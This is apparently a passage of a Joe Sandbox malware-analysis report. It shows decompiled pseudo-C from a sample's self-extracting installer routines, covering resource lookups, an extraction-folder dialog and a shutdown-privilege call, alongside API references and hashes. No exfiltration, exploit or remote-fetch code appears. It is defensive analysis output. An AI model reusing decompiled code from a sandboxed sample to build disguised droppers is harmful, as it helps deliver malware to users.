                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					__eax = E00131EA7(__ecx);
                                                                                                                                                                                                    					if(__eax != 2) {
                                                                                                                                                                                                    						L16:
                                                                                                                                                                                                    						return _t28;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						goto L12;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}

















                                                                                                                                                                                                    0x00131f90
                                                                                                                                                                                                    0x00131f90
                                                                                                                                                                                                    0x00131f93
                                                                                                                                                                                                    0x00131f98
                                                                                                                                                                                                    0x00131fa4
                                                                                                                                                                                                    0x00131fa7
                                                                                                                                                                                                    0x00131fc5
                                                                                                                                                                                                    0x00131fcd
                                                                                                                                                                                                    0x00131fdb
                                                                                                                                                                                                    0x00131ee5
                                                                                                                                                                                                    0x00131eea
                                                                                                                                                                                                    0x00131ef1
                                                                                                                                                                                                    0x00131ef4
                                                                                                                                                                                                    0x00131f0c
                                                                                                                                                                                                    0x00131f2e
                                                                                                                                                                                                    0x00131f3a
                                                                                                                                                                                                    0x00131f46
                                                                                                                                                                                                    0x00131f4d
                                                                                                                                                                                                    0x00131f58
                                                                                                                                                                                                    0x00131f60
                                                                                                                                                                                                    0x00131f61
                                                                                                                                                                                                    0x00131f62
                                                                                                                                                                                                    0x00131f75
                                                                                                                                                                                                    0x00131f80
                                                                                                                                                                                                    0x00131f77
                                                                                                                                                                                                    0x00131f77
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00131f77
                                                                                                                                                                                                    0x00131f64
                                                                                                                                                                                                    0x00131f64
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00131f64
                                                                                                                                                                                                    0x00131f0e
                                                                                                                                                                                                    0x00131f0e
                                                                                                                                                                                                    0x00131f13
                                                                                                                                                                                                    0x00131f13
                                                                                                                                                                                                    0x00131f14
                                                                                                                                                                                                    0x00131f14
                                                                                                                                                                                                    0x00131f16
                                                                                                                                                                                                    0x00131f17
                                                                                                                                                                                                    0x00131f1a
                                                                                                                                                                                                    0x00131f1f
                                                                                                                                                                                                    0x00131f1f
                                                                                                                                                                                                    0x00131f86
                                                                                                                                                                                                    0x00131f8f
                                                                                                                                                                                                    0x00131fcf
                                                                                                                                                                                                    0x00131fd3
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00131fd3
                                                                                                                                                                                                    0x00131fa9
                                                                                                                                                                                                    0x00131fb4
                                                                                                                                                                                                    0x00131fbb
                                                                                                                                                                                                    0x00131fc3
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00131fc3
                                                                                                                                                                                                    0x00131f9a
                                                                                                                                                                                                    0x00131f9a
                                                                                                                                                                                                    0x00131fa2
                                                                                                                                                                                                    0x00131fd9
                                                                                                                                                                                                    0x00131fda
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00131fa2

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000028,?,?), ref: 00131EFB
                                                                                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 00131F02
                                                                                                                                                                                                    • ExitWindowsEx.USER32(00000002,00000000), ref: 00131FD3
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Process$CurrentExitOpenTokenWindows
                                                                                                                                                                                                    • String ID: SeShutdownPrivilege
                                                                                                                                                                                                    • API String ID: 2795981589-3733053543
                                                                                                                                                                                                    • Opcode ID: 0ac44462c13ceea7cc4af82f70d5b615140a47895a08565eb45639e89772beca
                                                                                                                                                                                                    • Instruction ID: 44691098cabba5d54b14edac6f9ad24618f810c9cf0e55199b95733300c251f8
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0ac44462c13ceea7cc4af82f70d5b615140a47895a08565eb45639e89772beca
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5521F8B1B402057BEB309BA19C4AFBF7BBCEF85B10F60002DFA06E65C1D77588459661
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E00136CF0(struct _EXCEPTION_POINTERS* _a4) {
                                                                                                                                                                                                    
                                                                                                                                                                                                    				SetUnhandledExceptionFilter(0);
                                                                                                                                                                                                    				UnhandledExceptionFilter(_a4);
                                                                                                                                                                                                    				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                                                                                                                                    			}



                                                                                                                                                                                                    0x00136cf7
                                                                                                                                                                                                    0x00136d00
                                                                                                                                                                                                    0x00136d19

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00136E26,00131000), ref: 00136CF7
                                                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(00136E26,?,00136E26,00131000), ref: 00136D00
                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(C0000409,?,00136E26,00131000), ref: 00136D0B
                                                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000,?,00136E26,00131000), ref: 00136D12
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3231755760-0
                                                                                                                                                                                                    • Opcode ID: c144a40342c614280aa7dce5698d3a651433a39191134c1d87f26151c8ca823a
                                                                                                                                                                                                    • Instruction ID: 5119a92e7b26f3d2017ca56781170666e093268d8a5c28f21a9430dd35eab7da
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c144a40342c614280aa7dce5698d3a651433a39191134c1d87f26151c8ca823a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E2D0C932000208BBDB002BE1EC0CA593F28EF48212F844004F35982820CA7244918B52
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 76%
                                                                                                                                                                                                    			E00133210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* _t6;
                                                                                                                                                                                                    				void* _t10;
                                                                                                                                                                                                    				int _t20;
                                                                                                                                                                                                    				int _t21;
                                                                                                                                                                                                    				int _t23;
                                                                                                                                                                                                    				char _t24;
                                                                                                                                                                                                    				long _t25;
                                                                                                                                                                                                    				int _t27;
                                                                                                                                                                                                    				int _t30;
                                                                                                                                                                                                    				void* _t32;
                                                                                                                                                                                                    				int _t33;
                                                                                                                                                                                                    				int _t34;
                                                                                                                                                                                                    				int _t37;
                                                                                                                                                                                                    				int _t38;
                                                                                                                                                                                                    				int _t39;
                                                                                                                                                                                                    				void* _t42;
                                                                                                                                                                                                    				void* _t46;
                                                                                                                                                                                                    				CHAR* _t49;
                                                                                                                                                                                                    				void* _t58;
                                                                                                                                                                                                    				void* _t63;
                                                                                                                                                                                                    				struct HWND__* _t64;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t64 = _a4;
                                                                                                                                                                                                    				_t6 = _a8 - 0x10;
                                                                                                                                                                                                    				if(_t6 == 0) {
                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                    					L38:
                                                                                                                                                                                                    					EndDialog(_t64, ??);
                                                                                                                                                                                                    					L39:
                                                                                                                                                                                                    					__eflags = 1;
                                                                                                                                                                                                    					return 1;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t42 = 1;
                                                                                                                                                                                                    				_t10 = _t6 - 0x100;
                                                                                                                                                                                                    				if(_t10 == 0) {
                                                                                                                                                                                                    					E001343D0(_t64, GetDesktopWindow());
                                                                                                                                                                                                    					SetWindowTextA(_t64, "nst0dum");
                                                                                                                                                                                                    					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
                                                                                                                                                                                                    					__eflags =  *0x139a40 - _t42; // 0x3
                                                                                                                                                                                                    					if(__eflags == 0) {
                                                                                                                                                                                                    						EnableWindow(GetDlgItem(_t64, 0x836), 0);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					L36:
                                                                                                                                                                                                    					return _t42;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				if(_t10 == _t42) {
                                                                                                                                                                                                    					_t20 = _a12 - 1;
                                                                                                                                                                                                    					__eflags = _t20;
                                                                                                                                                                                                    					if(_t20 == 0) {
                                                                                                                                                                                                    						_t21 = GetDlgItemTextA(_t64, 0x835, 0x1391e4, 0x104);
                                                                                                                                                                                                    						__eflags = _t21;
                                                                                                                                                                                                    						if(_t21 == 0) {
                                                                                                                                                                                                    							L32:
                                                                                                                                                                                                    							_t58 = 0x4bf;
                                                                                                                                                                                                    							_push(0);
                                                                                                                                                                                                    							_push(0x10);
                                                                                                                                                                                                    							_push(0);
                                                                                                                                                                                                    							_push(0);
                                                                                                                                                                                                    							L25:
                                                                                                                                                                                                    							E001344B9(_t64, _t58);
                                                                                                                                                                                                    							goto L39;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t49 = 0x1391e4;
                                                                                                                                                                                                    						do {
                                                                                                                                                                                                    							_t23 =  *_t49;
                                                                                                                                                                                                    							_t49 =  &(_t49[1]);
                                                                                                                                                                                                    							__eflags = _t23;
                                                                                                                                                                                                    						} while (_t23 != 0);
                                                                                                                                                                                                    						__eflags = _t49 - 0x1391e5 - 3;
                                                                                                                                                                                                    						if(_t49 - 0x1391e5 < 3) {
                                                                                                                                                                                                    							goto L32;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t24 =  *0x1391e5; // 0x3a
                                                                                                                                                                                                    						__eflags = _t24 - 0x3a;
                                                                                                                                                                                                    						if(_t24 == 0x3a) {
                                                                                                                                                                                                    							L21:
                                                                                                                                                                                                    							_t25 = GetFileAttributesA(0x1391e4);
                                                                                                                                                                                                    							__eflags = _t25 - 0xffffffff;
                                                                                                                                                                                                    							if(_t25 != 0xffffffff) {
                                                                                                                                                                                                    								L26:
                                                                                                                                                                                                    								E0013658A(0x1391e4, 0x104, 0x131140);
                                                                                                                                                                                                    								_t27 = E001358C8(0x1391e4);
                                                                                                                                                                                                    								__eflags = _t27;
                                                                                                                                                                                                    								if(_t27 != 0) {
                                                                                                                                                                                                    									__eflags =  *0x1391e4 - 0x5c;
                                                                                                                                                                                                    									if( *0x1391e4 != 0x5c) {
                                                                                                                                                                                                    										L30:
                                                                                                                                                                                                    										_t30 = E0013597D(0x1391e4, 1, _t64, 1);
                                                                                                                                                                                                    										__eflags = _t30;
                                                                                                                                                                                                    										if(_t30 == 0) {
                                                                                                                                                                                                    											L35:
                                                                                                                                                                                                    											_t42 = 1;
                                                                                                                                                                                                    											__eflags = 1;
                                                                                                                                                                                                    											goto L36;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										L31:
                                                                                                                                                                                                    										_t42 = 1;
                                                                                                                                                                                                    										EndDialog(_t64, 1);
                                                                                                                                                                                                    										goto L36;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									__eflags =  *0x1391e5 - 0x5c;
                                                                                                                                                                                                    									if( *0x1391e5 == 0x5c) {
                                                                                                                                                                                                    										goto L31;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									goto L30;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                    								_push(0x10);
                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                    								_t58 = 0x4be;
                                                                                                                                                                                                    								goto L25;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t32 = E001344B9(_t64, 0x54a, 0x1391e4, 0, 0x20, 4);
                                                                                                                                                                                                    							__eflags = _t32 - 6;
                                                                                                                                                                                                    							if(_t32 != 6) {
                                                                                                                                                                                                    								goto L35;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t33 = CreateDirectoryA(0x1391e4, 0);
                                                                                                                                                                                                    							__eflags = _t33;
                                                                                                                                                                                                    							if(_t33 != 0) {
                                                                                                                                                                                                    								goto L26;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_push(0);
                                                                                                                                                                                                    							_push(0x10);
                                                                                                                                                                                                    							_push(0);
                                                                                                                                                                                                    							_push(0x1391e4);
                                                                                                                                                                                                    							_t58 = 0x4cb;
                                                                                                                                                                                                    							goto L25;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						__eflags =  *0x1391e4 - 0x5c;
                                                                                                                                                                                                    						if( *0x1391e4 != 0x5c) {
                                                                                                                                                                                                    							goto L32;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						__eflags = _t24 - 0x5c;
                                                                                                                                                                                                    						if(_t24 != 0x5c) {
                                                                                                                                                                                                    							goto L32;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						goto L21;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t34 = _t20 - 1;
                                                                                                                                                                                                    					__eflags = _t34;
                                                                                                                                                                                                    					if(_t34 == 0) {
                                                                                                                                                                                                    						EndDialog(_t64, 0);
                                                                                                                                                                                                    						 *0x139124 = 0x800704c7;
                                                                                                                                                                                                    						goto L39;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					__eflags = _t34 != 0x834;
                                                                                                                                                                                                    					if(_t34 != 0x834) {
                                                                                                                                                                                                    						goto L36;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t37 = LoadStringA( *0x139a3c, 0x3e8, 0x138598, 0x200);
                                                                                                                                                                                                    					__eflags = _t37;
                                                                                                                                                                                                    					if(_t37 != 0) {
                                                                                                                                                                                                    						_t38 = E00134224(_t64, _t46, _t46);
                                                                                                                                                                                                    						__eflags = _t38;
                                                                                                                                                                                                    						if(_t38 == 0) {
                                                                                                                                                                                                    							goto L36;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t39 = SetDlgItemTextA(_t64, 0x835, 0x1387a0);
                                                                                                                                                                                                    						__eflags = _t39;
                                                                                                                                                                                                    						if(_t39 != 0) {
                                                                                                                                                                                                    							goto L36;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t63 = 0x4c0;
                                                                                                                                                                                                    						L9:
                                                                                                                                                                                                    						E001344B9(_t64, _t63, 0, 0, 0x10, 0);
                                                                                                                                                                                                    						_push(0);
                                                                                                                                                                                                    						goto L38;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t63 = 0x4b1;
                                                                                                                                                                                                    					goto L9;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return 0;
                                                                                                                                                                                                    			}

























                                                                                                                                                                                                    0x0013321b
                                                                                                                                                                                                    0x0013321e
                                                                                                                                                                                                    0x00133221
                                                                                                                                                                                                    0x0013343c
                                                                                                                                                                                                    0x0013343e
                                                                                                                                                                                                    0x0013343f
                                                                                                                                                                                                    0x00133445
                                                                                                                                                                                                    0x00133447
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00133447
                                                                                                                                                                                                    0x00133229
                                                                                                                                                                                                    0x0013322a
                                                                                                                                                                                                    0x0013322f
                                                                                                                                                                                                    0x001333ec
                                                                                                                                                                                                    0x001333f7
                                                                                                                                                                                                    0x00133410
                                                                                                                                                                                                    0x00133416
                                                                                                                                                                                                    0x0013341d
                                                                                                                                                                                                    0x0013342d
                                                                                                                                                                                                    0x0013342d
                                                                                                                                                                                                    0x00133438
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00133438
                                                                                                                                                                                                    0x00133237
                                                                                                                                                                                                    0x00133243
                                                                                                                                                                                                    0x00133243
                                                                                                                                                                                                    0x00133246
                                                                                                                                                                                                    0x001332ee
                                                                                                                                                                                                    0x001332f4
                                                                                                                                                                                                    0x001332f6
                                                                                                                                                                                                    0x001333d4
                                                                                                                                                                                                    0x001333d6
                                                                                                                                                                                                    0x001333db
                                                                                                                                                                                                    0x001333dc
                                                                                                                                                                                                    0x001333de
                                                                                                                                                                                                    0x001333df
                                                                                                                                                                                                    0x00133370
                                                                                                                                                                                                    0x00133372
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00133372
                                                                                                                                                                                                    0x001332fc
                                                                                                                                                                                                    0x00133301
                                                                                                                                                                                                    0x00133301
                                                                                                                                                                                                    0x00133303
                                                                                                                                                                                                    0x00133304
                                                                                                                                                                                                    0x00133304
                                                                                                                                                                                                    0x0013330a
                                                                                                                                                                                                    0x0013330d
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00133313
                                                                                                                                                                                                    0x00133318
                                                                                                                                                                                                    0x0013331a
                                                                                                                                                                                                    0x00133331
                                                                                                                                                                                                    0x00133332
                                                                                                                                                                                                    0x0013333a
                                                                                                                                                                                                    0x0013333d
                                                                                                                                                                                                    0x0013337c
                                                                                                                                                                                                    0x00133388
                                                                                                                                                                                                    0x0013338f
                                                                                                                                                                                                    0x00133394
                                                                                                                                                                                                    0x00133396
                                                                                                                                                                                                    0x001333a4
                                                                                                                                                                                                    0x001333ab
                                                                                                                                                                                                    0x001333b6
                                                                                                                                                                                                    0x001333be
                                                                                                                                                                                                    0x001333c3
                                                                                                                                                                                                    0x001333c5
                                                                                                                                                                                                    0x00133435
                                                                                                                                                                                                    0x00133437
                                                                                                                                                                                                    0x00133437
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00133437
                                                                                                                                                                                                    0x001333c7
                                                                                                                                                                                                    0x001333c9
                                                                                                                                                                                                    0x001333cc
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001333cc
                                                                                                                                                                                                    0x001333ad
                                                                                                                                                                                                    0x001333b4
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001333b4
                                                                                                                                                                                                    0x00133398
                                                                                                                                                                                                    0x00133399
                                                                                                                                                                                                    0x0013339b
                                                                                                                                                                                                    0x0013339c
                                                                                                                                                                                                    0x0013339d
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0013339d
                                                                                                                                                                                                    0x0013334c
                                                                                                                                                                                                    0x00133351
                                                                                                                                                                                                    0x00133354
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0013335c
                                                                                                                                                                                                    0x00133362
                                                                                                                                                                                                    0x00133364
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00133366
                                                                                                                                                                                                    0x00133367
                                                                                                                                                                                                    0x00133369
                                                                                                                                                                                                    0x0013336a
                                                                                                                                                                                                    0x0013336b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0013336b
                                                                                                                                                                                                    0x0013331c
                                                                                                                                                                                                    0x00133323
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00133329
                                                                                                                                                                                                    0x0013332b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0013332b
                                                                                                                                                                                                    0x0013324c
                                                                                                                                                                                                    0x0013324c
                                                                                                                                                                                                    0x0013324f
                                                                                                                                                                                                    0x001332c8
                                                                                                                                                                                                    0x001332ce
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001332ce
                                                                                                                                                                                                    0x00133251
                                                                                                                                                                                                    0x00133256
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00133271
                                                                                                                                                                                                    0x00133277
                                                                                                                                                                                                    0x00133279
                                                                                                                                                                                                    0x00133298
                                                                                                                                                                                                    0x0013329d
                                                                                                                                                                                                    0x0013329f
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001332b0
                                                                                                                                                                                                    0x001332b6
                                                                                                                                                                                                    0x001332b8
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001332be
                                                                                                                                                                                                    0x00133280
                                                                                                                                                                                                    0x00133289
                                                                                                                                                                                                    0x0013328e
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0013328e
                                                                                                                                                                                                    0x0013327b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0013327b
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadStringA.USER32(000003E8,00138598,00000200), ref: 00133271
                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 001333E2
                                                                                                                                                                                                    • SetWindowTextA.USER32(?,nst0dum), ref: 001333F7
                                                                                                                                                                                                    • SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 00133410
                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000836), ref: 00133426
                                                                                                                                                                                                    • EnableWindow.USER32(00000000), ref: 0013342D
                                                                                                                                                                                                    • EndDialog.USER32(?,00000000), ref: 0013343F
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$nst0dum
                                                                                                                                                                                                    • API String ID: 2418873061-465967434
                                                                                                                                                                                                    • Opcode ID: 614ad43afd87ed0e4a670488e8ecd8f8ffbb8c69c4fb7c052b0b282f89b08591
                                                                                                                                                                                                    • Instruction ID: 1dae6257d8e9851597db5dc79139f2343f9ff2fcd883b455e64e471276ff36cb
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 614ad43afd87ed0e4a670488e8ecd8f8ffbb8c69c4fb7c052b0b282f89b08591
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6A516B303802407BEB265B355C8CF7B6E5DEF56B65F508128F2A5E65C0CFA4CE81A369
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                                                                                    			E00132CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t13;
                                                                                                                                                                                                    				void* _t20;
                                                                                                                                                                                                    				void* _t23;
                                                                                                                                                                                                    				void* _t27;
                                                                                                                                                                                                    				struct HRSRC__* _t31;
                                                                                                                                                                                                    				intOrPtr _t33;
                                                                                                                                                                                                    				void* _t43;
                                                                                                                                                                                                    				void* _t48;
                                                                                                                                                                                                    				signed int _t65;
                                                                                                                                                                                                    				struct HINSTANCE__* _t66;
                                                                                                                                                                                                    				signed int _t67;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t13 =  *0x138004; // 0xe764604f
                                                                                                                                                                                                    				_v8 = _t13 ^ _t67;
                                                                                                                                                                                                    				_t65 = 0;
                                                                                                                                                                                                    				_t66 = __ecx;
                                                                                                                                                                                                    				_t48 = __edx;
                                                                                                                                                                                                    				 *0x139a3c = __ecx;
                                                                                                                                                                                                    				memset(0x139140, 0, 0x8fc);
                                                                                                                                                                                                    				memset(0x138a20, 0, 0x32c);
                                                                                                                                                                                                    				memset(0x1388c0, 0, 0x104);
                                                                                                                                                                                                    				 *0x1393ec = 1;
                                                                                                                                                                                                    				_t20 = E0013468F("TITLE", 0x139154, 0x7f);
                                                                                                                                                                                                    				if(_t20 == 0 || _t20 > 0x80) {
                                                                                                                                                                                                    					_t64 = 0x4b1;
                                                                                                                                                                                                    					goto L32;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t27 = CreateEventA(0, 1, 1, 0);
                                                                                                                                                                                                    					 *0x13858c = _t27;
                                                                                                                                                                                                    					SetEvent(_t27);
                                                                                                                                                                                                    					_t64 = 0x139a34;
                                                                                                                                                                                                    					if(E0013468F("EXTRACTOPT", 0x139a34, 4) != 0) {
                                                                                                                                                                                                    						if(( *0x139a34 & 0x000000c0) == 0) {
                                                                                                                                                                                                    							L12:
                                                                                                                                                                                                    							 *0x139120 =  *0x139120 & _t65;
                                                                                                                                                                                                    							if(E00135C9E(_t48, _t48, _t65, _t66) != 0) {
                                                                                                                                                                                                    								if( *0x138a3a == 0) {
                                                                                                                                                                                                    									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
                                                                                                                                                                                                    									if(_t31 != 0) {
                                                                                                                                                                                                    										_t65 = LoadResource(_t66, _t31);
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									if( *0x138184 != 0) {
                                                                                                                                                                                                    										__imp__#17();
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									if( *0x138a24 == 0) {
                                                                                                                                                                                                    										_t57 = _t65;
                                                                                                                                                                                                    										if(E001336EE(_t65) == 0) {
                                                                                                                                                                                                    											goto L33;
                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                    											_t33 =  *0x139a40; // 0x3
                                                                                                                                                                                                    											_t48 = 1;
                                                                                                                                                                                                    											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
                                                                                                                                                                                                    												if(( *0x139a34 & 0x00000100) == 0 || ( *0x138a38 & 0x00000001) != 0 || E001318A3(_t64, _t66) != 0) {
                                                                                                                                                                                                    													goto L30;
                                                                                                                                                                                                    												} else {
                                                                                                                                                                                                    													_t64 = 0x7d6;
                                                                                                                                                                                                    													if(E00136517(_t57, 0x7d6, _t34, E001319E0, 0x547, 0x83e) != 0x83d) {
                                                                                                                                                                                                    														goto L33;
                                                                                                                                                                                                    													} else {
                                                                                                                                                                                                    														goto L30;
                                                                                                                                                                                                    													}
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                    												L30:
                                                                                                                                                                                                    												_t23 = _t48;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                    										_t23 = 1;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									E00132390(0x138a3a);
                                                                                                                                                                                                    									goto L33;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								_t64 = 0x520;
                                                                                                                                                                                                    								L32:
                                                                                                                                                                                                    								E001344B9(0, _t64, 0, 0, 0x10, 0);
                                                                                                                                                                                                    								goto L33;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							_t64 =  &_v268;
                                                                                                                                                                                                    							if(E0013468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
                                                                                                                                                                                                    								goto L3;
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								_t43 = CreateMutexA(0, 1,  &_v268);
